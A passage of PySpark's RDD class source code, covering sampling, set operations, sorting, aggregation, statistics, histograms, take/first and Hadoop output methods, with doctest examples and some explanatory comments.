>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
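# Worked example (approximate, illustrative only): without replacement, with num=100 and
# total=1000, fraction=0.1, delta=0.00005 and gamma=-log(delta)/total ~= 0.0099, so the
# returned rate is ~= 0.1 + 0.0099 + sqrt(0.0099**2 + 2*0.0099*0.1) ~= 0.156, i.e. sample
# roughly 15.6% of the RDD to get at least 100 elements with very high probability.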
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
        This fold operation may be applied to partitions individually, and then
        those partial results are folded into the final result, rather than applying
        the fold to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
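    # A minimal usage sketch, assuming an active SparkContext `sc`: the StatCounter
    # returned here is the same object backing mean()/variance()/stdev() below, so a
    # single pass over the RDD yields all of these summaries at once.
    #   st = sc.parallelize([1.0, 2.0, 3.0]).stats()
    #   (st.count(), st.mean(), st.stdev())   # roughly (3, 2.0, 0.816...)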
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
        e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. Given the inputs 1
        and 50, the resulting histogram would be 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, then using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
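    # A hedged configuration sketch, assuming an active SparkContext `sc` and a
    # TextOutputFormat-compatible pair RDD; the Hadoop keys and the output path
    # below are illustrative assumptions and depend on the chosen OutputFormat.
    #   conf = {
    #       "mapreduce.job.outputformat.class":
    #           "org.apache.hadoop.mapreduce.lib.output.TextOutputFormat",
    #       "mapreduce.job.output.key.class": "org.apache.hadoop.io.Text",
    #       "mapreduce.job.output.value.class": "org.apache.hadoop.io.Text",
    #       "mapreduce.output.fileoutputformat.outputdir": "/tmp/new_api_out",
    #   }
    #   sc.parallelize([("k", "v")]).saveAsNewAPIHadoopDataset(conf)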
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
